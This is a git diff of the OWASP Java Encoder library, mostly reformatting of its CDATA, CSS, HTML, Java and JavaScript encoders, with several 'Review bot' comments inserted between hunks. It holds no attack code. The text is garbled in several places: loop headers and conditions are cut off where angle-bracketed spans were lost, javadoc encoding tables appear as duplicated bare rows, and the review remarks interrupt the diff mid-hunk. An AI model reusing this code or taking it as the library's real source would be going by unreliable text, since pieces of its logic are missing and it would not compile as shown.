- if (j >= m) { - return overflow(input, i, output, j); - } - out[j++] = ']'; - i++; - break; - } else { - break; } + } else if (endOfInput) { + // seen "]", then end of input. + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ']'; + i++; + break; + } else { + break; } } else if (ch < Character.MIN_HIGH_SURROGATE) { if (ch > Unicode.MAX_C1_CTRL_CHAR || ch == Unicode.NEL) { @@ -284,11 +285,12 @@ class CDATAEncoder extends Encoder { } else { break; } - } else if ( // low surrogate without preceding high surrogate + } else if (// low surrogate without preceding high surrogate ch <= Character.MAX_LOW_SURROGATE - || // non characters - ch > '\ufffd' - || ('\ufdd0' <= ch && ch <= '\ufdef')) { + // or non-characters + || ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef')) + { if (j >= m) { return overflow(input, i, output, j); } @@ -299,9 +301,7 @@ class CDATAEncoder extends Encoder { } out[j++] = ch; } - } - return underflow(input, i, output, j); } diff --git a/core/src/main/java/org/owasp/encoder/CSSEncoder.java b/core/src/main/java/org/owasp/encoder/CSSEncoder.java index 00ea4c0..2f597b5 100644 --- a/core/src/main/java/org/owasp/encoder/CSSEncoder.java +++ b/core/src/main/java/org/owasp/encoder/CSSEncoder.java @@ -56,7 +56,7 @@ class CSSEncoder extends Encoder { * Encoding mode of operation--specified the set of characters that * required encoding. */ - static enum Mode { + enum Mode { /** * String contexts. Characters between quotes. * @@ -136,7 +136,7 @@ class CSSEncoder extends Encoder { * * @param mode the mode of the encoder. */ - public CSSEncoder(Mode mode) { + CSSEncoder(Mode mode) { _mode = mode; _lowMask = mode.lowMask(); _highMask = mode.highMask(); 
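Review bot: The two `else { break; }` arms in the `]` handling (a trailing `]`, and a trailing `]]`, when `endOfInput` is false) are the part of this block a maintainer is most likely to misread, because the same hunk emits `]` for the identical input once `endOfInput` is true; a why-comment on each would help, e.g. `// not at end of input: cannot yet tell whether "]]>" follows, so stop and let the caller supply more input (presumably underflow re-reads from i)`. I do not see a behavioral change in this brace restructuring, but the nesting is now seven levels deep in places, so pulling the `]`-run handling into a private helper would make the three outcomes (copy, encode "]]>", or wait for more input) visible at a glance. The enclosing array-encoding loop begins before this hunk.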
@@ -256,10 +256,14 @@ class CSSEncoder extends Encoder { boolean needsSpace = false; if (i+1 < n) { char la = in[i + 1]; - if ('0' <= la && la <= '9' || - 'a' <= la && la <= 'f' || - 'A' <= la && la <= 'F' || - la == ' ' || la == '\n' || la == '\r' || la == '\t' || la == '\f') + if ('0' <= la && la <= '9' + || 'a' <= la && la <= 'f' + || 'A' <= la && la <= 'F' + || la == ' ' + || la == '\n' + || la == '\r' + || la == '\t' + || la == '\f') { needsSpace = true; k++; diff --git a/core/src/main/java/org/owasp/encoder/ChainedEncoder.java b/core/src/main/java/org/owasp/encoder/ChainedEncoder.java index 0c268b4..c28ae40 100644 --- a/core/src/main/java/org/owasp/encoder/ChainedEncoder.java +++ b/core/src/main/java/org/owasp/encoder/ChainedEncoder.java @@ -68,7 +68,7 @@ class ChainedEncoder extends Encoder { * @param first the first encoder to apply * @param last the second/last encoder to apply. */ - public ChainedEncoder(Encoder first, Encoder last) { + ChainedEncoder(Encoder first, Encoder last) { _first = first; _last = last; } diff --git a/core/src/main/java/org/owasp/encoder/Encode.java b/core/src/main/java/org/owasp/encoder/Encode.java index 1d3d406..511bfa5 100644 --- a/core/src/main/java/org/owasp/encoder/Encode.java +++ b/core/src/main/java/org/owasp/encoder/Encode.java @@ -347,22 +347,54 @@ public final class Encode { * * *
                    - * - * - * - * - * - * - * - * - * - * - * - * - * - * - * - * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * + * * *
                    Encoding Description
                    Input CharacterEncoded ResultNotes
                    Input CharacterEncoded ResultNotes
                    U+0008BS\bBackspace character
                    U+0008BS\bBackspace character
                    U+0009HT\tHorizontal tab character
                    U+0009HT\tHorizontal tab character
                    U+000ALF\nLine feed character
                    U+000ALF\nLine feed character
                    U+000CFF\fForm feed character
                    U+000CFF\fForm feed character
                    U+000DCR\rCarriage return character
                    U+000DCR\rCarriage return character
                    U+0022"\x22The encoding \" is not used here because + *
                    U+0022"\x22The encoding \" is not used here because * it is not safe for use in HTML attributes. (In HTML * attributes, it would also be correct to use * "\&quot;".)
                    U+0026&\x26Ampersand character
                    U+0026&\x26Ampersand character
                    U+0027'\x27The encoding \' is not used here because + *
                    U+0027'\x27The encoding \' is not used here because * it is not safe for use in HTML attributes. (In HTML * attributes, it would also be correct to use * "\&#39;".)
                    U+002F/\/This encoding is used to avoid an input sequence + *
                    U+002F/\/This encoding is used to avoid an input sequence * "</" from prematurely terminating a </script> * block.
                    U+005C\\\
                    U+005C\\\
                    U+0000 to U+001F\x##Hexadecimal encoding is used for characters in this + *
                    U+0000 to U+001F\x##Hexadecimal encoding is used for characters in this * range that were not already mentioned in above.
                    {@code U+0009} (horizontal tab){@code }
                    {@code U+000A} (line feed){@code }
                    {@code U+000C} (form feed){@code }
                    {@code U+000D} (carriage return){@code }
                    {@code U+0020} (space){@code }
                    {@code &}{@code &}
                    {@code <}{@code <}
                    {@code >}{@code >}
                    {@code "}{@code "}
                    {@code '}{@code '}
                    {@code /}{@code /}
                    {@code =}{@code =}
                    {@code `}{@code `}
                    {@code U+0085} (next line){@code …}
                    {@code U+2028} (line separator){@code 
}
                    {@code U+2029} (paragraph separator){@code 
}
                    {@code U+0009} (horizontal tab){@code }
                    {@code U+000A} (line feed){@code }
                    {@code U+000C} (form feed){@code }
                    {@code U+000D} (carriage return){@code }
                    {@code U+0020} (space){@code }
                    {@code &}{@code &}
                    {@code <}{@code <}
                    {@code >}{@code >}
                    {@code "}{@code "}
                    {@code '}{@code '}
                    {@code /}{@code /}
                    {@code =}{@code =}
                    {@code `}{@code `}
                    {@code U+0085} (next line){@code …}
                    {@code U+2028} (line separator){@code 
}
                    {@code U+2029} (paragraph separator){@code 
}
                    * @@ -1294,9 +1326,8 @@ public final class Encode { // else, it's an overflow, we need to use a new output buffer // we'll allocate this buffer to be the exact size of the worst // case, guaranteeing a second overflow would not be possible. - CharBuffer tmp = CharBuffer.allocate( - _output.position() + - encoder.maxEncodedLength(_input.remaining())); + CharBuffer tmp = CharBuffer.allocate(_output.position() + + encoder.maxEncodedLength(_input.remaining())); // copy over everything that has been encoded so far tmp.put(_output.array(), 0, _output.position()); diff --git a/core/src/main/java/org/owasp/encoder/HTMLEncoder.java b/core/src/main/java/org/owasp/encoder/HTMLEncoder.java index e41c294..ad36223 100644 --- a/core/src/main/java/org/owasp/encoder/HTMLEncoder.java +++ b/core/src/main/java/org/owasp/encoder/HTMLEncoder.java @@ -31,40 +31,48 @@ // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. - package org.owasp.encoder; import java.nio.CharBuffer; import java.nio.charset.CoderResult; /** - *
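Review bot: The JavaScript encoding table in this javadoc lists U+0000–U+001F, the quote characters, `&`, `/` and `\`, but says nothing about U+2028 and U+2029, which are line terminators in JavaScript and are the classic gap in JS string escaping (a string literal containing them is a syntax error in engines before ES2019). If JavaScriptEncoder escapes them, which this diff does not show, a row such as `U+2028, U+2029 | \u2028, \u2029 | JavaScript line terminators, not permitted inside string literals` should be added so readers do not assume they pass through; if it does not, that is a correctness gap worth its own issue. The rows also appear duplicated in the extracted text here, so the table markup should be eyeballed in the rendered javadoc.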

                    HTMLEncoder -- an encoder for HTML contexts. Currently most - * HTML-based contexts are properly handled by {@line XMLEncoder}. - * The remaining HTML-specific context of "unquoted attributes" could - * not be added to the XMLEncoder without slowing it down. This class - * implements that remaining context: unquoted attribute - * values.

                    + *

                    + * HTMLEncoder -- an encoder for HTML contexts. Currently most HTML-based + * contexts are properly handled by {@link XMLEncoder}. The remaining + * HTML-specific context of "unquoted attributes" could not be added to the + * XMLEncoder without slowing it down. This class implements that remaining + * context: unquoted attribute values.

                    * - *

                    Note: because this context is likely small strings, and - * hopefully rarely used, no effort was put into optimizing this - * encoder.

                    + *

                    + * Note: because this context is likely small strings, and hopefully rarely + * used, no effort was put into optimizing this encoder.

                    * * @author Jeff Ichnowski */ class HTMLEncoder extends Encoder { + /** - * Number of characters in the encoding prefix and suffix when using - * decimal numeric encodings of the form "&#...;". + * Number of characters in the encoding prefix and suffix when using decimal + * numeric encodings of the form "&#...;". */ private static final int ENCODE_AFFIX_CHAR_COUNT = 3; - /** Encoding for '\t'. */ + /** + * Encoding for '\t'. + */ private static final char[] TAB = " ".toCharArray(); - /** Encoding for '&'. */ + /** + * Encoding for '&'. + */ private static final char[] AMP = "&".toCharArray(); - /** Encoding for '<'. */ + /** + * Encoding for '<'. + */ private static final char[] LT = "<".toCharArray(); - /** Encoding for '>'. */ + /** + * Encoding for '>'. + */ private static final char[] GT = ">".toCharArray(); // The large table-switch implementation used here is fast to 
@@ -72,94 +80,167 @@ class HTMLEncoder extends Encoder { // encoders that use selective if/else's. Look at the results of // BenchmarkTest to see the difference. See note in javadoc as to // reasoning. - // On Core i7 (Sandybridge) // Baseline is 371.401009 ns/op // Benchmarked Encode.forXml: 324.219992 ns/op (-12.70% on baseline) // Benchmarked Encode.forHtmlUnquotedAttribute: 821.583263 ns/op (+121.21% on baseline) - - @Override int maxEncodedLength(int n) { // if everything is line separators and paragraph separators then // we get "⁛" - return n*(ENCODE_AFFIX_CHAR_COUNT+4); + return n * (ENCODE_AFFIX_CHAR_COUNT + 4); } @Override int firstEncodedOffset(String input, int off, int len) { - final int n = off+len; - for (int i=off ; i': - return i; - - case '!': case '#': case '$': case '%': - case '(': case ')': case '*': case '+': - case ',': case '-': case '.': - - case '0': case '1': case '2': case '3': case '4': - case '5': case '6': case '7': case '8': case '9': - case ':': case ';': case '?': case '@': - - case 'A': case 'B': case 'C': case 'D': case 'E': - case 'F': case 'G': case 'H': case 'I': case 'J': - case 'K': case 'L': case 'M': case 'N': case 'O': - case 'P': case 'Q': case 'R': case 'S': case 'T': - case 'U': case 'V': case 'W': case 'X': case 'Y': - case 'Z': - - case '[': case '\\': case ']': case '^': case '_': - - case 'a': case 'b': case 'c': case 'd': case 'e': - case 'f': case 'g': case 'h': case 'i': case 'j': - case 'k': case 'l': case 'm': case 'n': case 'o': - case 'p': case 'q': case 'r': case 's': case 't': - case 'u': case 'v': case 'w': case 'x': case 'y': - case 'z': - - case '{': case '|': case '}': case '~': - break; // valid - - default: - - if (Character.isHighSurrogate(ch)) { - if (i+1 < n) { - if (Character.isLowSurrogate(input.charAt(i+1))) { - int cp = Character.toCodePoint(ch, input.charAt(i+1)); - if (Unicode.isNonCharacter(cp)) { - return i; - } else { - ++i; + case '\t': + case '\r': + case '\f': + case '\n': + case ' ': 
+ case Unicode.NEL: + case '\"': + case '\'': + case '/': + case '=': + case '`': + case '&': + case '<': + case '>': + return i; + + case '!': + case '#': + case '$': + case '%': + case '(': + case ')': + case '*': + case '+': + case ',': + case '-': + case '.': + + case '0': + case '1': + case '2': + case '3': + case '4': + case '5': + case '6': + case '7': + case '8': + case '9': + case ':': + case ';': + case '?': + case '@': + + case 'A': + case 'B': + case 'C': + case 'D': + case 'E': + case 'F': + case 'G': + case 'H': + case 'I': + case 'J': + case 'K': + case 'L': + case 'M': + case 'N': + case 'O': + case 'P': + case 'Q': + case 'R': + case 'S': + case 'T': + case 'U': + case 'V': + case 'W': + case 'X': + case 'Y': + case 'Z': + + case '[': + case '\\': + case ']': + case '^': + case '_': + + case 'a': + case 'b': + case 'c': + case 'd': + case 'e': + case 'f': + case 'g': + case 'h': + case 'i': + case 'j': + case 'k': + case 'l': + case 'm': + case 'n': + case 'o': + case 'p': + case 'q': + case 'r': + case 's': + case 't': + case 'u': + case 'v': + case 'w': + case 'x': + case 'y': + case 'z': + + case '{': + case '|': + case '}': + case '~': + break; // valid + + default: + + if (Character.isHighSurrogate(ch)) { + if (i + 1 < n) { + if (Character.isLowSurrogate(input.charAt(i + 1))) { + int cp = Character.toCodePoint(ch, input.charAt(i + 1)); + if (Unicode.isNonCharacter(cp)) { + return i; + } else { + ++i; + } + break; } - break; + } else { + return i; } - } else { + } + + if (ch <= Unicode.MAX_C1_CTRL_CHAR + || Character.MIN_SURROGATE <= ch && ch <= Character.MAX_SURROGATE + || ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef') + || ch == Unicode.LINE_SEPARATOR || ch == Unicode.PARAGRAPH_SEPARATOR) + { return i; } - } - - if (ch <= Unicode.MAX_C1_CTRL_CHAR || - Character.MIN_SURROGATE <= ch && ch <= Character.MAX_SURROGATE || - ch > '\ufffd' || - ('\ufdd0' <= ch && ch <= '\ufdef') || - ch == Unicode.LINE_SEPARATOR || ch == 
Unicode.PARAGRAPH_SEPARATOR) - { - return i; - } } } return n; } /** - * Appends a source array verbatim to the output array. Caller must - * insure there is enough space in the array for the output. + * Appends a source array verbatim to the output array. Caller must insure + * there is enough space in the array for the output. * * @param src the characters to copy * @param out the output buffer @@ -173,8 +254,7 @@ class HTMLEncoder extends Encoder { /** * Appends the numerically encoded version of {@code codePoint} to the - * output buffer. Caller must insure there is enough space for the - * output. + * output buffer. Caller must insure there is enough space for the output. * * @param codePoint the character to encode * @param out the output buffer @@ -185,23 +265,21 @@ class HTMLEncoder extends Encoder { out[j++] = '&'; out[j++] = '#'; if (codePoint >= 1000) { - out[j++] = (char)(codePoint / 1000 % 10 + '0'); + out[j++] = (char) (codePoint / 1000 % 10 + '0'); } if (codePoint >= 100) { - out[j++] = (char)(codePoint / 100 % 10 + '0'); + out[j++] = (char) (codePoint / 100 % 10 + '0'); } if (codePoint >= 10) { - out[j++] = (char)(codePoint / 10 % 10 + '0'); + out[j++] = (char) (codePoint / 10 % 10 + '0'); } - out[j++] = (char)(codePoint % 10 + '0'); + out[j++] = (char) (codePoint % 10 + '0'); out[j++] = ';'; return j; } @Override - CoderResult encodeArrays( - CharBuffer input, CharBuffer output, boolean endOfInput) - { + CoderResult encodeArrays(CharBuffer input, CharBuffer output, boolean endOfInput) { final char[] in = input.array(); final char[] out = output.array(); int i = input.arrayOffset() + input.position(); 
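Review bot: In the `default:` arm of the reformatted switch, a high surrogate that is followed by something other than a low surrogate falls silently out of the `if (Character.isHighSurrogate(ch))` block and is only rejected by the `Character.MIN_SURROGATE <= ch && ch <= Character.MAX_SURROGATE` test further down; that dependency deserves a comment at the end of the surrogate block, e.g. `// unpaired high surrogate: rejected by the surrogate-range test below`. The explicit safe-character cases appear to cover every printable ASCII character not returned in the first group, which is worth stating in a comment above the list so the two lists can be checked against each other when either is edited. The reflowed javadoc for the append helper at the tail of this hunk should read `ensure`, not `insure`.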
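Review bot: The decimal `encode` helper in this hunk writes at most four digits (the `>= 1000`, `>= 100`, `>= 10` ladder), so a code point of 10000 or more would be emitted as a silently truncated, wrong character reference, and nothing in the method guards or documents that limit. The removed side of the following hunk shows it being called only for ASCII and `Unicode.NEL`, and `maxEncodedLength` assumes a seven-character worst case consistent with the U+2028/U+2029 separators, so the precondition appears to hold today but is unstated. I would extend the existing tag to `@param codePoint the character to encode; must be below 10000 (at most four decimal digits)` and add `assert codePoint >= 0 && codePoint < 10000;` as the first statement. The encodeArrays signature reflowed at the end of this hunk opens a method whose body lies outside it.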
@@ -209,8 +287,8 @@ class HTMLEncoder extends Encoder { int j = output.arrayOffset() + output.position(); final int m = output.arrayOffset() + output.limit(); - charLoop: - for ( ; i m) { - return overflow(input, i, output, j); - } - j = append(TAB, out, j); - break; - - case '\r': case '\n': case '\f': case ' ': case '\"': case '\'': - case '/': case '=': case '`': - if (ENCODE_AFFIX_CHAR_COUNT+2+j > m) { - return overflow(input, i, output, j); - } - j = encode(ch, out, j); - break; - - case Unicode.NEL: - if (ENCODE_AFFIX_CHAR_COUNT+3+j > m) { - return overflow(input, i, output, j); - } - j = encode(ch, out, j); - break; - - case '&': - if (j + AMP.length > m) { - return overflow(input, i, output, j); - } - j = append(AMP, out, j); - break; - - case '<': - if (j + LT.length > m) { - return overflow(input, i, output, j); - } - j = append(LT, out, j); - break; - - case '>': - if (j + GT.length > m) { - return overflow(input, i, output, j); - } - j = append(GT, out, j); - break; - - case '!': case '#': case '$': case '%': - case '(': case ')': case '*': case '+': - case ',': case '-': case '.': - - case '0': case '1': case '2': case '3': case '4': - case '5': case '6': case '7': case '8': case '9': - case ':': case ';': case '?': case '@': - - case 'A': case 'B': case 'C': case 'D': case 'E': - case 'F': case 'G': case 'H': case 'I': case 'J': - case 'K': case 'L': case 'M': case 'N': case 'O': - case 'P': case 'Q': case 'R': case 'S': case 'T': - case 'U': case 'V': case 'W': case 'X': case 'Y': - case 'Z': - - case '[': case '\\': case ']': case '^': case '_': - - case 'a': case 'b': case 'c': case 'd': case 'e': - case 'f': case 'g': case 'h': case 'i': case 'j': - case 'k': case 'l': case 'm': case 'n': case 'o': - case 'p': case 'q': case 'r': case 's': case 't': - case 'u': case 'v': case 'w': case 'x': case 'y': - case 'z': case '{': case '|': case '}': case '~': - if (j >= m) { - return overflow(input, i, output, j); - } - out[j++] = ch; - break; - default: 
- - if (Character.isHighSurrogate(ch)) { - if (i+1 < n) { - if (Character.isLowSurrogate(in[i+1])) { - int cp = Character.toCodePoint(ch, in[i+1]); - if (Unicode.isNonCharacter(cp)) { - if (j >= m) { - return overflow(input, i, output, j); - } - out[j++] = '-'; - ++i; - } else { - if (j+1 >= m) { - return overflow(input, i, output, j); + case '\t': + if (j + TAB.length > m) { + return overflow(input, i, output, j); + } + j = append(TAB, out, j); + break; + + case '\r': + case '\n': + case '\f': + case ' ': + case '\"': + case '\'': + case '/': + case '=': + case '`': + if (ENCODE_AFFIX_CHAR_COUNT + 2 + j > m) { + return overflow(input, i, output, j); + } + j = encode(ch, out, j); + break; + + case Unicode.NEL: + if (ENCODE_AFFIX_CHAR_COUNT + 3 + j > m) { + return overflow(input, i, output, j); + } + j = encode(ch, out, j); + break; + + case '&': + if (j + AMP.length > m) { + return overflow(input, i, output, j); + } + j = append(AMP, out, j); + break; + + case '<': + if (j + LT.length > m) { + return overflow(input, i, output, j); + } + j = append(LT, out, j); + break; + + case '>': + if (j + GT.length > m) { + return overflow(input, i, output, j); + } + j = append(GT, out, j); + break; + + case '!': + case '#': + case '$': + case '%': + case '(': + case ')': + case '*': + case '+': + case ',': + case '-': + case '.': + + case '0': + case '1': + case '2': + case '3': + case '4': + case '5': + case '6': + case '7': + case '8': + case '9': + case ':': + case ';': + case '?': + case '@': + + case 'A': + case 'B': + case 'C': + case 'D': + case 'E': + case 'F': + case 'G': + case 'H': + case 'I': + case 'J': + case 'K': + case 'L': + case 'M': + case 'N': + case 'O': + case 'P': + case 'Q': + case 'R': + case 'S': + case 'T': + case 'U': + case 'V': + case 'W': + case 'X': + case 'Y': + case 'Z': + + case '[': + case '\\': + case ']': + case '^': + case '_': + + case 'a': + case 'b': + case 'c': + case 'd': + case 'e': + case 'f': + case 'g': + case 'h': + case 'i': + 
case 'j': + case 'k': + case 'l': + case 'm': + case 'n': + case 'o': + case 'p': + case 'q': + case 'r': + case 's': + case 't': + case 'u': + case 'v': + case 'w': + case 'x': + case 'y': + case 'z': + case '{': + case '|': + case '}': + case '~': + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + break; + default: + + if (Character.isHighSurrogate(ch)) { + if (i + 1 < n) { + if (Character.isLowSurrogate(in[i + 1])) { + int cp = Character.toCodePoint(ch, in[i + 1]); + if (Unicode.isNonCharacter(cp)) { + if (j >= m) { + return overflow(input, i, output, j); + } + out[j++] = '-'; + ++i; + } else { + if (j + 1 >= m) { + return overflow(input, i, output, j); + } + out[j++] = ch; + out[j++] = in[++i]; } - out[j++] = ch; - out[j++] = in[++i]; + break; } - break; + } else if (!endOfInput) { + break charLoop; } - } else if (!endOfInput) { - break charLoop; } - } - - if (j >= m) { - return overflow(input, i, output, j); - } - - if (ch <= Unicode.MAX_C1_CTRL_CHAR || - Character.MIN_SURROGATE <= ch && ch <= Character.MAX_SURROGATE || - ch > '\ufffd' || - ('\ufdd0' <= ch && ch <= '\ufdef')) - { - // invalid - out[j++] = '-'; - } else if (ch == Unicode.LINE_SEPARATOR || ch == Unicode.PARAGRAPH_SEPARATOR) { - if (ENCODE_AFFIX_CHAR_COUNT+4+j > m) { + + if (j >= m) { return overflow(input, i, output, j); } - j = encode(ch, out, j); - } else { - out[j++] = ch; - } + + if (ch <= Unicode.MAX_C1_CTRL_CHAR + || Character.MIN_SURROGATE <= ch && ch <= Character.MAX_SURROGATE + || ch > '\ufffd' + || ('\ufdd0' <= ch && ch <= '\ufdef')) + { + // invalid + out[j++] = '-'; + } else if (ch == Unicode.LINE_SEPARATOR || ch == Unicode.PARAGRAPH_SEPARATOR) { + if (ENCODE_AFFIX_CHAR_COUNT + 4 + j > m) { + return overflow(input, i, output, j); + } + j = encode(ch, out, j); + } else { + out[j++] = ch; + } } } diff --git a/core/src/main/java/org/owasp/encoder/JavaEncoder.java b/core/src/main/java/org/owasp/encoder/JavaEncoder.java index 7f4231b..277a721 100644 
--- a/core/src/main/java/org/owasp/encoder/JavaEncoder.java
+++ b/core/src/main/java/org/owasp/encoder/JavaEncoder.java
@@ -31,32 +31,39 @@ // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. - package org.owasp.encoder; import java.nio.CharBuffer; import java.nio.charset.CoderResult; /** - * JavaEncoder -- Encoder for Java based strings. Useful if in Java code - * generators to generate efficiently encoded strings for arbitrary data. - * This encoder uses the minimal sequence of characters required to encode - * a character (e.g. standard backslash escapes, such as "\n", "\\" , "\'", - * octal escapes, and unicode escapes). This encoder does NOT check UTF-16 - * surrogate pair sequences. The target output context supports mismatched - * UTF-16 pairs (e.g. it will compile, run, etc... with them). + * JavaEncoder -- Encoder for Java based strings. Useful if in Java code + * generators to generate efficiently encoded strings for arbitrary data. This + * encoder uses the minimal sequence of characters required to encode a + * character (e.g. standard backslash escapes, such as "\n", "\\" , "\'", octal + * escapes, and unicode escapes). This encoder does NOT check UTF-16 surrogate + * pair sequences. The target output context supports mismatched UTF-16 pairs + * (e.g. it will compile, run, etc... with them). * * @author Jeff Ichnowski */ class JavaEncoder extends Encoder { - /** The length of a Unicode escape, e.g. "\\u1234". */ + /** + * The length of a Unicode escape, e.g. "\\u1234". + */ static final int U_ESCAPE_LENGTH = 6; - /** The length of a octal escape sequence, e.g. "\377". */ + /** + * The length of a octal escape sequence, e.g. "\377". + */ static final int OCT_ESCAPE_LENGTH = 4; - /** Number of bits to shift for each octal unit. */ + /** + * Number of bits to shift for each octal unit. + */ static final int OCT_SHIFT = 3; - /** The bit-mask for an octal unit. */ + /** + * The bit-mask for an octal unit. + */ static final int OCT_MASK = 7; @Override 
@@ -67,8 +74,8 @@ class JavaEncoder extends Encoder { @Override protected int firstEncodedOffset(String input, int off, int len) { - final int n = off+len; - for (int i=off ; i= ' ' && ch <= '~') { if (ch == '\\' || ch == '\'' || ch == '\"') { @@ -82,9 +89,7 @@ class JavaEncoder extends Encoder { } @Override - protected CoderResult encodeArrays( - CharBuffer input, CharBuffer output, boolean endOfInput) - { + protected CoderResult encodeArrays(CharBuffer input, CharBuffer output, boolean endOfInput) { final char[] in = input.array(); final char[] out = output.array(); int i = input.arrayOffset() + input.position(); @@ -92,12 +97,12 @@ class JavaEncoder extends Encoder { int j = output.arrayOffset() + output.position(); final int m = output.arrayOffset() + output.limit(); - charLoop: - for ( ; i= ' ' && ch <= '~') { if (ch == '\\' || ch == '\'' || ch == '\"') { - if (j+1 >= m) { + if (j + 1 >= m) { return overflow(input, i, output, j); } out[j++] = '\\'; 
@@ -110,97 +115,97 @@ class JavaEncoder extends Encoder { } } else { switch (ch) { - case '\b': - if (j+1 >= m) { - return overflow(input, i, output, j); - } - out[j++] = '\\'; - out[j++] = 'b'; - break; - case '\t': - if (j+1 >= m) { - return overflow(input, i, output, j); - } - out[j++] = '\\'; - out[j++] = 't'; - break; - case '\n': - if (j+1 >= m) { - return overflow(input, i, output, j); - } - out[j++] = '\\'; - out[j++] = 'n'; - break; - case '\f': - if (j+1 >= m) { - return overflow(input, i, output, j); - } - out[j++] = '\\'; - out[j++] = 'f'; - break; - case '\r': - if (j+1 >= m) { - return overflow(input, i, output, j); - } - out[j++] = '\\'; - out[j++] = 'r'; - break; - default: - if (ch <= '\377') { - longEscapeNeeded: - { - if (ch <= '\37') { - // "short" octal escapes: '\0' to '\37' - // cannot be followed by '0' to '7' thus - // require a lookahead to use. - if (i+1 < n) { - char la = in[i + 1]; - if ('0' <= la && la <= '7') { - break longEscapeNeeded; - } - } else if (!endOfInput) { - // need more characters to see if we can use - // a short octal escape. 
- break charLoop; - } - - if (ch <= '\7') { - if (j+1 >= m) { - return overflow(input, i, output, j); - } - out[j++] = '\\'; - out[j++] = (char)(ch + '0'); - } else { - if (j+2 >= m) { - return overflow(input, i, output, j); - } - out[j++] = '\\'; - out[j++] = (char)((ch >>> OCT_SHIFT) + '0'); - out[j++] = (char)((ch & OCT_MASK) + '0'); - } - - continue; - } + case '\b': + if (j + 1 >= m) { + return overflow(input, i, output, j); } - - if (j + OCT_ESCAPE_LENGTH > m) { + out[j++] = '\\'; + out[j++] = 'b'; + break; + case '\t': + if (j + 1 >= m) { return overflow(input, i, output, j); } out[j++] = '\\'; - out[j++] = (char)((ch >>> 2*OCT_SHIFT) + '0'); - out[j++] = (char)(((ch >>> OCT_SHIFT) & OCT_MASK) + '0'); - out[j++] = (char)((ch & OCT_MASK) + '0'); - } else { - if (j+U_ESCAPE_LENGTH > m) { + out[j++] = 't'; + break; + case '\n': + if (j + 1 >= m) { return overflow(input, i, output, j); } out[j++] = '\\'; - out[j++] = 'u'; - out[j++] = HEX[ch >>> 3*HEX_SHIFT]; - out[j++] = HEX[(ch >>> 2*HEX_SHIFT) & HEX_MASK]; - out[j++] = HEX[(ch >>> HEX_SHIFT) & HEX_MASK]; - out[j++] = HEX[ch & HEX_MASK]; - } + out[j++] = 'n'; + break; + case '\f': + if (j + 1 >= m) { + return overflow(input, i, output, j); + } + out[j++] = '\\'; + out[j++] = 'f'; + break; + case '\r': + if (j + 1 >= m) { + return overflow(input, i, output, j); + } + out[j++] = '\\'; + out[j++] = 'r'; + break; + default: + if (ch <= '\377') { + longEscapeNeeded: + { + if (ch <= '\37') { + // "short" octal escapes: '\0' to '\37' + // cannot be followed by '0' to '7' thus + // require a lookahead to use. + if (i + 1 < n) { + char la = in[i + 1]; + if ('0' <= la && la <= '7') { + break longEscapeNeeded; + } + } else if (!endOfInput) { + // need more characters to see if we can use + // a short octal escape. 
+ break charLoop; + } + + if (ch <= '\7') { + if (j + 1 >= m) { + return overflow(input, i, output, j); + } + out[j++] = '\\'; + out[j++] = (char) (ch + '0'); + } else { + if (j + 2 >= m) { + return overflow(input, i, output, j); + } + out[j++] = '\\'; + out[j++] = (char) ((ch >>> OCT_SHIFT) + '0'); + out[j++] = (char) ((ch & OCT_MASK) + '0'); + } + + continue; + } + } + + if (j + OCT_ESCAPE_LENGTH > m) { + return overflow(input, i, output, j); + } + out[j++] = '\\'; + out[j++] = (char) ((ch >>> 2 * OCT_SHIFT) + '0'); + out[j++] = (char) (((ch >>> OCT_SHIFT) & OCT_MASK) + '0'); + out[j++] = (char) ((ch & OCT_MASK) + '0'); + } else { + if (j + U_ESCAPE_LENGTH > m) { + return overflow(input, i, output, j); + } + out[j++] = '\\'; + out[j++] = 'u'; + out[j++] = HEX[ch >>> 3 * HEX_SHIFT]; + out[j++] = HEX[(ch >>> 2 * HEX_SHIFT) & HEX_MASK]; + out[j++] = HEX[(ch >>> HEX_SHIFT) & HEX_MASK]; + out[j++] = HEX[ch & HEX_MASK]; + } } } } diff --git a/core/src/main/java/org/owasp/encoder/JavaScriptEncoder.java b/core/src/main/java/org/owasp/encoder/JavaScriptEncoder.java index b7c0501..5ff0335 100644 --- a/core/src/main/java/org/owasp/encoder/JavaScriptEncoder.java +++ b/core/src/main/java/org/owasp/encoder/JavaScriptEncoder.java @@ -31,7 +31,6 @@ // STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) // ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED // OF THE POSSIBILITY OF SUCH DAMAGE. - package org.owasp.encoder; import java.nio.CharBuffer; 
@@ -47,38 +46,35 @@ class JavaScriptEncoder extends Encoder { /** * Mode of operation constants for the JavaScriptEncoder. */ - static enum Mode { + enum Mode { /** - * Standard encoding of JavaScript Strings. Escape sequences are chosen - * according to what is the shortest sequence possible for the character. + * Standard encoding of JavaScript Strings. Escape sequences are chosen + * according to what is the shortest sequence possible for the + * character. */ SOURCE, - /** - * Encoding for use in HTML attributes. Quote characters are escaped - * using hex encodes instead of backslashes. The alternate would be - * to use a sequence of encodes that would actually be longer. In this - * mode double-quote is "\x22" and single-quote is "\x27". (In HTML + * Encoding for use in HTML attributes. Quote characters are escaped + * using hex encodes instead of backslashes. The alternate would be to + * use a sequence of encodes that would actually be longer. In this mode + * double-quote is "\x22" and single-quote is "\x27". (In HTML * attributes the alternate would be encoding "\"" and "\'" with entity * escapes to "\&#34;" and "\&39;"). */ ATTRIBUTE, - /** - * Encoding for use in HTML script blocks. The main concern here is + * Encoding for use in HTML script blocks. The main concern here is * permaturely terminating a script block with a closing "</" inside - * the string. This encoding escapes "/" as "\/" to prevent such + * the string. This encoding escapes "/" as "\/" to prevent such * termination. */ BLOCK, - 